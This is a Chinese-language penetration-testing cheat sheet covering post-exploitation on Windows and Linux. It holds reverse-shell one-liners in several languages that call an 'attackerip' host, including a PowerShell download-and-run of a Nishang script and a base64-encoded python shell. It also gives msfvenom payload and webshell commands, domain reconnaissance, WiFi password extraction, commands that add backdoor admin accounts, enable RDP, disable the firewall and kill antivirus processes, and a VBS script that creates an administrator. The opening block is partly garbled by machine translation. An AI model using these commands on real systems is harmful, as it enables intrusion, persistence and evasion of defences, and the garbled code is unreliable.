反弹shell 　　

　　

　　基本姿势 　　

　　

　　多种小姿势反弹 　　

　　

　　1 .袭击者监听NC-lvvp 4444受害者运行bash-I/dev/TCP/attackerip/4444012。网络计算机支持-e选项攻击者监听NC-lvvp 4444受害者运行ncattackerip 4444-t-e/bin/bash 3。python攻击者监听NC-lvvp 4444受害者运行python-c'importsocket，子进程，OS；s=socket.socket(socket .AF_INET，插座.SOCK _ STREAM)；s.connect(('attackerip '，4444))；os.dup2(s.fileno()，0)；os.dup2(s.fileno()，1)；os.dup2(s.fileno()，2)；p=subprocess.call('/bin/bash '，'-I ')；4.phpattacker监听NC-lvvp 4444受害者运行PHP-r ' $ sock=fsockopen(' attackerip '，4444)；exec('/bin/sh-I 3323 ')；'或者你直接在网目录写入一个服务器端编程语言(专业超文本预处理器的缩写)文件，然后浏览器去访问他就行了，这有一个(https://my。奥斯中国。net/中国隐士/blog/144035)5。爪哇脚本r=运行时间。get runtime()p=r . exec('/bin/bash '，'-c '，' exec 5/dev/TCP/attackerip/4444；cat 5 | while readline doline 255 done ' as string)p . wait for()6 .实际抽取与汇报语言脚本perl-e '使用套接字；$ i=' attackerip$ p=4444socket(S，PF_INET，SOCK_STREAM，getprotobyname(' TCP '))；if(connect(S，sockaddr_in($p，inet _ aton($ I)){ open(STDIN，S ')；open(STDOUT，S ')；open(STDERR，' S ')；exec('/bin/sh-I ')；};7.powershellvictim受害人受害人运行powershellIEX(新-ObjectNet .网络客户端).下载字符串(' https://raw。githubusercontent。com/samratashok/nishang/9 a3c 747 BCF 535 ef 82d C4 C5 c 66 AAC 36 db 47 C2 afde/shell/Invoke-powershell TCP。PS1’)；invoke-powershell TCP-Reverse-IPAddressattackerip 　　

> -port 4444

　　

*MSFVenom生成常用payload *

　　

1. 生成二进制文件关于二进制文件，主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。Windows    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeLinux    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfMac    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho如何利用?以Windows为例，使用上面的命令生成一个exe的payload，复制shell.exe到Windows机器，然后kali下开启msf使用如下命令监听4444端口：    msfconsole    use exploit/multi/handler    set PAYLOAD windows/meterpreter/reverse_tcp    set LHOST <自己的IP>    set LPORT 4444    set ExitOnSession false    exploit -j -z执行完之后在Windows下执行shell.exe2. 生成webshell脚本在做web渗透的时候，经常会用到webshell，我们经常用的一句话用菜刀连接，如何使用MSFVenom生成一个可以用msf操作的webshell?PHP    msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.phpASP    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSP    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWAR    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war如何利用？下面以php为例做一下测试，使用以下命令生成一个webshell,在kali上使用msf执行下面的命令，监听端口4444：    msfconsole    use exploit/multi/handler    set PAYLOAD php/meterpreter_reverse_tcp    set LHOST <自己的IP>    set LPORT 4444    set ExitOnSession false    exploit -j -z将shell.php放在web目录下，使用浏览器访问，或者使用以下命令执行：    php shell.php3. 脚本shell关于使用脚本反弹shell的方式，主要以python、bash、perl为例。Python    msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBash    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerl    msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.plPowershell    msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f psh > shell.ps1    powershell.exe -ExecutionPolicy Bypass -File shell.ps1如何使用？下面就以Python为例做一下测试，使用以下命令生成一个脚本，在kali上使用msf执行下面的命令，监听端口4444：    msfconsole    use exploit/multi/handler    set PAYLOAD cmd/unix/reverse_python    set LHOST <自己的IP>    set LPORT 4444    set ExitOnSession false    exploit -j -z然后复制shell.py中的内容在linux命令行下执行，如下：    python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

　　

信息收集

　　

　　

前期收集

　　

query user || qwinsta 查看当前在线用户net user  查看本机用户net user /domain 查看域用户net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多net view /domain 查看有几个域net view \\\\dc   查看 dc 域内共享文件net group /domain 查看域里面的组net group "domain admins" /domain 查看域管net localgroup administrators /domain   /这个也是查域管，是升级为域控时，本地账户也成为域管net group "domain controllers" /domain 域控net time /domain net config workstation   当前登录域 - 计算机名 - 用户名net use \\\\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机，可访问资源ipconfigsysteminfotasklist /svctasklist /S ip /U domain\username /P /V 查看远程计算机 tasklistnet localgroup administrators && whoami 查看当前是不是属于管理组netstat -anonltest /dclist:xx  查看域控whoami /all 查看 Mandatory Label uac 级别和 sid 号net sessoin 查看远程连接 session (需要管理权限)net share     共享目录cmdkey /l   查看保存登陆凭证echo %logonserver%  查看登陆域spn –l administrator spn 记录set  环境变量dsquery server - 查找目录中的 AD DC/LDS 实例dsquery user - 查找目录中的用户dsquery computer 查询所有计算机名称 windows 2003dir /s *.exe 查找指定目录下及子目录下没隐藏文件arp -a

　　

其他命令

　　

ping       icmp 连通性nslookup www.baidu.com vps-ip dns 连通性dig @vps-ip www.baidu.comcurl vps:8080  http 连通性tracertbitsadmin /transfer n http://ip/xx.exe C:\windows\temp\x.exe一种上传文件 >= 2008fuser -nv tcp 80 查看端口 pidrdesktop -u username ip linux 连接 win 远程桌面 (有可能不成功)where file win 查找文件是否存在 找路径，Linux 下使用命令 find -name *.jsp 来查找，Windows 下，使用 for /r c:\windows\temp\ %i in (file lsss.dmp) do @echo %inetstat -apn | grep 8888   kill -9 PID   查看端口并 kill

　　

发现密码

　　

发现远程登录密码等密码:

　　

https://www.nirsoft.net/utils/network_password_recovery.htmlwifi 密码：

　　

netsh wlan show profile     查处 wifi 名netsh wlan show profile WiFi-name key=clear 获取对应 wifi 的密码

　　

进阶命令

　　

　　

远程登录

　　

判断是内网，还是外网，内网转发到 vps

　　

netstat -ano   没有开启 3389 端口,复查下tasklist /svc,查 svchost.exe 对应的 TermService 的 pid,看 netstat 相等的 pid 即 3389 端口.

　　

添加账号

　　

net user admin1 admin1 /add & net localgroup administrators admin1 /add*如不允许远程连接，修改注册表 *

　　

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /fREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f如果系统未配置过远程桌面服务，第一次开启时还需要添加防火墙规则，允许 3389 端口，命令如下:

　　

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow关闭防火墙

　　

netsh firewall set opmode mode=disable解决system权限3389无法添加的用户情况:

　　

判断原因：I.杀软篇1.360杀毒软件2.麦咖啡杀毒软件3.卡巴斯基杀毒软件4.其他杀毒软件或防护软件II.策略篇1.3389端口变更2.莫名其妙无法添加账户3.管理员限制篇4.系统已达最大连接数处理———————–I. 杀软篇—————————–1. 360杀毒软件        taskkill /im 进程名.exe /f把主动防御结束。360相关进程如下：360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe有些SYSYTEM权限却干不掉360，例如360tray.exe,360safe.exe，可以先query user看看管理员状态，因为很可能是管理员登陆以后运行了图形界面没关闭，系统不执行taskkill所以logoff把管理员踢了，然后360有的进程就自己灭了，这种情况多出现在2008的server系统上2. 麦咖啡杀毒软件完整一下过程就是，启用Guest账户，修改Guest用户的密码，添加Guest为administrators用户组这三条命令第二条或者第三条有时候可能不会显示命令执行成功，但是实际上只要是SYSTEM权限，就应该可以执行成功的，有无回显并不重要。    net user guest /active:yes          //将guest用户启用    net user guest silic!&11133        //修改guest密码    net localgroup administrators guest /add    //添加guest到管理员用户组中3. 卡巴斯基调整系统时间，让卡巴的key失效mkdir建立以非法字符“.”命名的文件夹，将pr等提权程序传进去。4. 金山防护软件主要是KSafeSvc.exetaskkill搞不定就用ntsdntsd -c q -p PID金山毒霸+金山卫士+瑞星防火墙的组合可以将如下代码保存到c:\windows\temp\a.vbsDefault    set wsnetwork=CreateObject("WSCRIPT.NETWORK")    os="WinNT://"&wsnetwork.ComputerName    Set ob=GetObject(os)    Set oe=GetObject(os&"/Administrators,group")    Set od=ob.Create("user","silic")    od.SetPassword "silic"    od.SetInfo    Set of=GetObject(os&"/silic",user)    oe.add os&"/silic"然后用如下命令执行，就能得到账户为silic密码为silic的管理员账户了：    cscript c:\windows\temp\a.vbs5. 禁用服务法    sc config 服务名 start= disabled给杀软服务设置为禁用，重启服务器，杀毒防护服务就不能运行。就无阻畅通了，例如：    sc config MsMpSvc start= disabled——————————–II,策略篇—————————–1. 3389端口变更进行3389添加账户前首先要知道3389到底开启没有。netstat -ano查看端口和使用端口的进程pid，然后Tasklist看一下有哪个svchost.exe进程的pid使用了端口注意，是svchost.exe当中的某个。2. 莫名奇妙无法添加账户把密码位数设置长一点就ok，原先密码是123456，现在改为1234abcd!@#$就过了如果还是添加不上，可以尝试用vbs脚本来添加3. 管理员限制管理员直接把c:\windows\system32的net.exe给删了或者换了于是你直接net的时候会提示拒绝访问或者不是系统命令等。管你自己传一个自己的net.exe就突破了。当然，也有64位系统和你的程序不兼容的情况发生，他是64你就传64位的4. 达到最大连接限制有时候添加了账户，但是连接提示最大连接数限制。首先query user查看在线的账户，然后看他的登陆ID，一般是0，最高不超过8，超过8说明服务器好久没重启了（这个没准的）然后logoff ID，就把对应ID的管理员踢掉了。然后就能登录了。

　　

隐藏 win 账户

　　

渗透技巧——Windows 系统的帐户隐藏

　　

　　

端口转发与代理工具

　　

参考文章：

　　

渗透测试中弹shell的多种方式及bypass

　　

史上最强内网渗透知识点总结

　　

解决system权限3389无法添加的用户情况